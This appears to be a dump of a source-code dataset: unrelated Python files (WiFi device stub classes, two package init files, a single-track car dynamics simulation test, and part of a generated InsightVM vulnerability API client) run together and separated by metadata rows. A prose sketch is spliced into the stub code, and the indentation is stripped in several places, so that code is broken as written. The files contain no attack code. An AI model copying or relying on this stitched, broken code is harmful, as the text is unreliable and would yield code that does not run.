:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_ssid(self, *args, **kwargs):
"""Stub to get SSID.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_security(self, *args, **kwargs):
"""Stub to get security mode.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_password(self, *args, **kwargs):
"""Stub to get password.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_channel_utilization(self, *args, **kwargs):
"""Stub to get channel utilization.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_operating_mode(self, *args, **kwargs):
"""Stub to get operating mode.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_bandwidth(self, *args, **kwargs):
"""Stub to get bandwidth.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_broadcast(self, *args, **kwargs):
"""Stub to get the broadcast.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_channel_number(self, *args, **kwargs):
"""Stub to get the channel number.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def prepare(self):
"""Stub to prepare.
:param self: self object
:type self: object
"""
pass
def cleanup(self):
"""Stub to cleanup.
:param self: self object
:type self: object
"""
pass
def apply_changes(self):
"""Stub used to save the configs to be modified.
:param self: self object
:type self: object
"""
pass
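A minimal sketch of how a device class might fill in these stubs, and how apply_changes_no_delay is meant to gate when changes are pushed (the subclass and its queueing attribute are hypothetical, not part of boardfarm):

class ExampleRouterWiFi(WiFiStub):
    """Hypothetical concrete stub, for illustration only."""

    def __init__(self):
        self._pending = {}  # queued-but-unapplied settings

    def set_ssid(self, ssid):
        self._pending["ssid"] = ssid
        # Honor the class flag documented above: either push at once,
        # or wait for an explicit apply_changes() call.
        if self.apply_changes_no_delay:
            self.apply_changes()

    def apply_changes(self):
        # A real implementation would write self._pending to the device
        # (CLI, SNMP, TR-069, ...) before clearing it.
        self._pending.clear()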
class WiFiClientStub:
"""Wifi client stub."""
def enable_wifi(self):
"""Wifi client stub used to enable WiFi/ make the WiFi interface UP.
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def disable_wifi(self):
"""Wifi client stub used to enable WiFi/ make the WiFi interface DOWN.
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def disable_and_enable_wifi(self):
"""Wifi client stub used to disable and enable WiFi/.
Make the WiFi interface DOWN and UP
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_scan(self):
"""Wifi client stub used to scan for SSIDs on a particular radio and return a list of SSID.
Note: this code does not execute, but rather serves as an example for
the API
return "SSID: <ssid_name1> SSID: <ssid_name2>.."
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_check_ssid(self, ssid_name):
"""Wifi client stub used to scan for particular SSID.
Note: this code does not execute, but rather serves as an example for
the API
return True if found
return False if not found
:param self: self object
:type self: object
:param ssid_name: ssid name to be scanned for
:type ssid_name: string
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_connect(self, ssid_name, password, security_mode):
"""Wifi client stub used to connect to wifi.
Either with ssid name and password or with ssid name alone.
:param self: self object
:type self: object
:param ssid_name: ssid name to be scanned for
:type ssid_name: string
:param password: password to be used to connect to SSID
:type password: string
:param security_mode: security mode of WiFi
:type security_mode: string
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_connectivity_verify(self):
"""Wifi client stub used to verify wifi connectivity.
Note : this code does not execute, but rather serves as an example for
the API
return True or False
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_disconnect(self):
"""Wifi client stub used to disconnect WiFi.
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_change_region(self, country):
"""Wifi client stub used to change the country.
:param self: self object
:type self: object
:param country: country to change to
:type country: string
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
| 29.957672 | 99 | 0.589898 | 1,370 | 11,324 | 4.835037 | 0.084672 | 0.09058 | 0.1875 | 0.092391 | 0.856884 | 0.847524 | 0.79212 | 0.750151 | 0.73279 | 0.711202 | 0 | 0.000262 | 0.324709 | 11,324 | 377 | 100 | 30.037135 | 0.865961 | 0.577888 | 0 | 0.47619 | 0 | 0 | 0.149017 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.47619 | false | 0.095238 | 0 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
78d8e8e63e01a6d862e17eb4f9f107afebbc88b6 | 108 | py | Python | PygameFloatObjects/examples/__init__.py | MrComboF10/PygameFloatObjects | e139a3b542d1ef2d54604e2769827c9da6d2cee3 | [
"MIT"
] | null | null | null | PygameFloatObjects/examples/__init__.py | MrComboF10/PygameFloatObjects | e139a3b542d1ef2d54604e2769827c9da6d2cee3 | [
"MIT"
] | null | null | null | PygameFloatObjects/examples/__init__.py | MrComboF10/PygameFloatObjects | e139a3b542d1ef2d54604e2769827c9da6d2cee3 | [
"MIT"
] | null | null | null | from PygameFloatObjects.examples import circle_example
from PygameFloatObjects.examples import rect_example
| 36 | 54 | 0.907407 | 12 | 108 | 8 | 0.583333 | 0.458333 | 0.625 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 108 | 2 | 55 | 54 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
600f08102369b73fc9f0aa06a7ac89c869596b33 | 132 | py | Python | string_demon/__init__.py | guokr/string_demon | f883a334a8105a039c205bed59f6568cf547bf04 | [
"MIT"
] | null | null | null | string_demon/__init__.py | guokr/string_demon | f883a334a8105a039c205bed59f6568cf547bf04 | [
"MIT"
] | null | null | null | string_demon/__init__.py | guokr/string_demon | f883a334a8105a039c205bed59f6568cf547bf04 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from .text import spam_check
from .text import lcs_check
from .text import blacklist_check
| 18.857143 | 33 | 0.780303 | 22 | 132 | 4.545455 | 0.636364 | 0.24 | 0.42 | 0.38 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008772 | 0.136364 | 132 | 6 | 34 | 22 | 0.868421 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
601b7acd7148713beba625ee7a1d5999ef5e4f24 | 13,686 | py | Python | neural_clbf/systems/tests/test_single_track_car.py | saxenam06/neural_clbf | 1f2a43b579330172a03f284a5673b00f0899c755 | [
"BSD-3-Clause"
] | 9 | 2022-01-22T11:47:11.000Z | 2022-03-08T14:49:38.000Z | neural_clbf/systems/tests/test_single_track_car.py | saxenam06/neural_clbf | 1f2a43b579330172a03f284a5673b00f0899c755 | [
"BSD-3-Clause"
] | 1 | 2021-11-14T22:30:20.000Z | 2021-11-19T14:40:49.000Z | neural_clbf/systems/tests/test_single_track_car.py | saxenam06/neural_clbf | 1f2a43b579330172a03f284a5673b00f0899c755 | [
"BSD-3-Clause"
] | 5 | 2022-01-23T17:02:52.000Z | 2022-03-29T22:26:59.000Z | """Test the 2D quadrotor dynamics"""
from copy import copy
import matplotlib.pyplot as plt
import tqdm
import numpy as np
import torch
from neural_clbf.systems import STCar
def test_stcar_init():
"""Test initialization of kinematic car"""
# Test instantiation with valid parameters
valid_params = {
"psi_ref": 1.0,
"v_ref": 1.0,
"a_ref": 0.0,
"omega_ref": 0.0,
}
stcar = STCar(valid_params)
assert stcar is not None
assert stcar.n_dims == 7
assert stcar.n_controls == 2
def plot_stcar_straight_path():
"""Test the dynamics of the kinematic car tracking a straight path"""
# Create the system
params = {
"psi_ref": 0.5,
"v_ref": 10.0,
"a_ref": 0.0,
"omega_ref": 0.0,
}
dt = 0.001
stcar = STCar(params, dt)
upper_u_lim, lower_u_lim = stcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 1.0
n_sims = 1
controller_period = 0.01
num_timesteps = int(t_sim // dt)
start_x = torch.tensor([[0.0, 1.0, 0.0, 1.0, -np.pi / 6, 0.0, 0.0]])
x_sim = torch.zeros(num_timesteps, n_sims, stcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, stcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = stcar.u_nominal(x_current)
for dim_idx in range(stcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = stcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
)
# # check that the dynamics are rotation invariant
# for j in range(10):
# psi_ref_new = params["psi_ref"] + j * np.pi / 10
# test_params = copy(params)
# test_params["psi_ref"] = psi_ref_new
# xdot_test = stcar.closed_loop_dynamics(
# x_current[i, :].unsqueeze(0), u[i, :].unsqueeze(0), test_params
# )
# assert torch.allclose(xdot, xdot_test)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
psi_ref = params["psi_ref"]
x_ref = t * params["v_ref"] * np.cos(psi_ref)
y_ref = t * params["v_ref"] * np.sin(psi_ref)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, stcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, stcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax1.set_ylim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_xlim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_aspect("equal")
# psi_err_path = x_sim[:, :, stcar.PSI_E].cpu().squeeze().numpy()
# delta_path = x_sim[:, :, stcar.DELTA].cpu().squeeze().numpy()
# v_err_path = x_sim[:, :, stcar.VE].cpu().squeeze().numpy()
# ax1.plot(t[:t_final], y_err_path[:t_final])
# ax1.plot(t[:t_final], x_err_path[:t_final])
# ax1.plot(t[:t_final], psi_err_path[:t_final])
# ax1.plot(t[:t_final], delta_path[:t_final])
# ax1.plot(t[:t_final], v_err_path[:t_final])
# ax1.legend(["y", "x", "psi", "delta", "ve"])
ax2 = axs[1]
plot_u_indices = [stcar.VDELTA, stcar.ALONG]
plot_u_labels = ["$v_\\delta$", "$a_{long}$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, :].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
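The path-centric-to-world conversion above is a rotation of the error vector by the reference heading, plus the reference position; written out (with $(x_e, y_e)$ the path-frame errors and $\psi_{ref}$ the reference heading), this is a restatement of the code:

$$\begin{pmatrix} x_{world} \\ y_{world} \end{pmatrix} = \begin{pmatrix} x_{ref} \\ y_{ref} \end{pmatrix} + \begin{pmatrix} \cos\psi_{ref} & -\sin\psi_{ref} \\ \sin\psi_{ref} & \cos\psi_{ref} \end{pmatrix} \begin{pmatrix} x_e \\ y_e \end{pmatrix}$$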
def plot_stcar_circle_path():
"""Test the dynamics of the kinematic car tracking a circle path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": 10.0,
"a_ref": 0.0,
"omega_ref": 0.5,
}
dt = 0.01
stcar = STCar(params, dt)
upper_u_lim, lower_u_lim = stcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 20.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = torch.tensor([[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]])
x_sim = torch.zeros(num_timesteps, n_sims, stcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, stcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = stcar.u_nominal(x_current)
for dim_idx in range(stcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Get the path parameters at this point
psi_ref[tstep] = dt * params["omega_ref"] + psi_ref[tstep - 1]
pt = copy(params)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = stcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, stcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, stcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax2 = axs[1]
plot_u_indices = [stcar.VDELTA, stcar.ALONG]
plot_u_labels = ["$v_\\delta$", "$a_{long}$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, :].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
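Unlike the straight-path case, the reference pose here is integrated alongside the simulation with forward Euler, one update per simulation step (again a restatement of the loop above):

$$\psi_{ref}^{t} = \psi_{ref}^{t-1} + \Delta t\,\omega_{ref}, \qquad x_{ref}^{t} = x_{ref}^{t-1} + \Delta t\,v_{ref}\cos\psi_{ref}^{t}, \qquad y_{ref}^{t} = y_{ref}^{t-1} + \Delta t\,v_{ref}\sin\psi_{ref}^{t}$$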
def plot_stcar_s_path(v_ref: float = 10.0):
"""Test the dynamics of the kinematic car tracking a S path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": v_ref,
"a_ref": 0.0,
"omega_ref": 0.0,
}
dt = 0.01
stcar = STCar(params, dt)
upper_u_lim, lower_u_lim = stcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 10.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = torch.tensor([[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]])
x_sim = torch.zeros(num_timesteps, n_sims, stcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, stcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
pt = copy(params)
for tstep in tqdm.trange(1, num_timesteps):
# Get the path parameters at this point
omega_ref_t = 1.0 * np.sin(tstep * dt) + params["omega_ref"]
psi_ref[tstep] = dt * omega_ref_t + psi_ref[tstep - 1]
pt = copy(pt)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
pt["omega_ref"] = omega_ref_t
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = stcar.u_nominal(x_current, pt)
for dim_idx in range(stcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = stcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, stcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, stcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax2 = axs[1]
# plot_u_indices = [stcar.VDELTA, stcar.ALONG]
# plot_u_labels = ["$v_\\delta$", "$a_{long}$"]
# for i_trace in range(len(plot_u_indices)):
# ax2.plot(
# t[1:t_final],
# u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
# label=plot_u_labels[i_trace],
# )
ax2.plot(
t[:t_final],
x_sim[:t_final, :, stcar.BETA].cpu().squeeze().numpy(),
label="beta",
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, :].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
# Return the maximum tracking error
tracking_error = x_sim[
:,
:,
[
STCar.SXE,
STCar.SYE,
STCar.VE,
STCar.PSI_E,
],
]
return tracking_error[:t_final, :, :].norm(dim=-1).squeeze().max()
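The S shape comes from modulating the reference yaw rate sinusoidally before each Euler step, $\omega_{ref}(t) = \sin(t) + \omega_{ref,0}$ (with $\omega_{ref,0} = 0$ in the parameters above), so the reference heading swings back and forth while the speed stays at $v_{ref}$. The value returned is the peak norm of the $(x_e, y_e, v_e, \psi_e)$ tracking-error components, which the commented-out sweep in the main block below uses to compare reference velocities.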
if __name__ == "__main__":
# plot_stcar_straight_path()
# plot_stcar_circle_path()
plot_stcar_s_path()
# max_tracking_error = []
# v_refs = np.linspace(5.0, 100.0, 10)
# for v_ref in v_refs:
# max_tracking_error.append(plot_stcar_s_path(v_ref))
# plt.plot(v_refs, max_tracking_error, linestyle=":", marker="x")
# plt.xlabel("Reference velocity (m/s)")
# plt.ylabel("Max tracking error")
# plt.title("LQR controller with single-track model")
# plt.show()
| 31.680556 | 85 | 0.559404 | 2,032 | 13,686 | 3.510335 | 0.098917 | 0.033646 | 0.011356 | 0.012898 | 0.834572 | 0.817889 | 0.79742 | 0.781859 | 0.766578 | 0.747091 | 0 | 0.025212 | 0.292854 | 13,686 | 431 | 86 | 31.75406 | 0.711821 | 0.20225 | 0 | 0.760656 | 0 | 0 | 0.035754 | 0 | 0 | 0 | 0 | 0 | 0.009836 | 1 | 0.013115 | false | 0 | 0.019672 | 0 | 0.036066 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
607077d0d8b2dfa52517551cd7612f50d5da9a22 | 104,046 | py | Python | rapid7vmconsole/api/vulnerability_api.py | kiblik/vm-console-client-python | 038f6d33e8b2654a558326c6eb87f09ee23e0e22 | [
"MIT"
] | 61 | 2018-05-17T05:57:09.000Z | 2022-03-08T13:59:21.000Z | rapid7vmconsole/api/vulnerability_api.py | kiblik/vm-console-client-python | 038f6d33e8b2654a558326c6eb87f09ee23e0e22 | [
"MIT"
] | 33 | 2018-06-26T16:21:14.000Z | 2022-03-03T20:55:47.000Z | rapid7vmconsole/api/vulnerability_api.py | kiblik/vm-console-client-python | 038f6d33e8b2654a558326c6eb87f09ee23e0e22 | [
"MIT"
] | 43 | 2018-02-24T05:45:53.000Z | 2022-03-31T22:15:16.000Z | # coding: utf-8
"""
Python InsightVM API Client
OpenAPI spec version: 3
Contact: support@rapid7.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from rapid7vmconsole.api_client import ApiClient
class VulnerabilityApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_affected_assets(self, id, **kwargs): # noqa: E501
"""Vulnerability Affected Assets # noqa: E501
Get the assets affected by the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_affected_assets(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithAssetIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_affected_assets_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_affected_assets_with_http_info(id, **kwargs) # noqa: E501
return data
def get_affected_assets_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Affected Assets # noqa: E501
Get the assets affected by the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_affected_assets_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithAssetIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_affected_assets" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_affected_assets`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/assets', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithAssetIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
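Every endpoint wrapper below repeats this same synchronous/asynchronous shape, so one usage sketch covers them all. The host, credentials, and vulnerability id are placeholders; and because the generated methods pass empty auth_settings, Basic auth is attached as a default header here, which is an assumption based on this client's usual setup convention:

import base64

import rapid7vmconsole

config = rapid7vmconsole.Configuration()
config.host = "https://console.example.com:3780"  # placeholder console URL
client = rapid7vmconsole.ApiClient(configuration=config)
token = base64.b64encode(b"user:pass").decode("ascii")  # placeholder credentials
client.default_headers["Authorization"] = "Basic " + token

api = rapid7vmconsole.VulnerabilityApi(client)

# Synchronous call: returns the deserialized model directly.
refs = api.get_affected_assets("example-vulnerability-id")  # placeholder id
# Asynchronous call: returns a thread whose .get() yields the same model.
thread = api.get_affected_assets("example-vulnerability-id", async_req=True)
refs = thread.get()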
def get_exploit(self, id, **kwargs): # noqa: E501
"""Exploit # noqa: E501
Returns the details for an exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: Exploit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_exploit_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_exploit_with_http_info(id, **kwargs) # noqa: E501
return data
def get_exploit_with_http_info(self, id, **kwargs): # noqa: E501
"""Exploit # noqa: E501
Returns the details for an exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: Exploit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_exploit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_exploit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
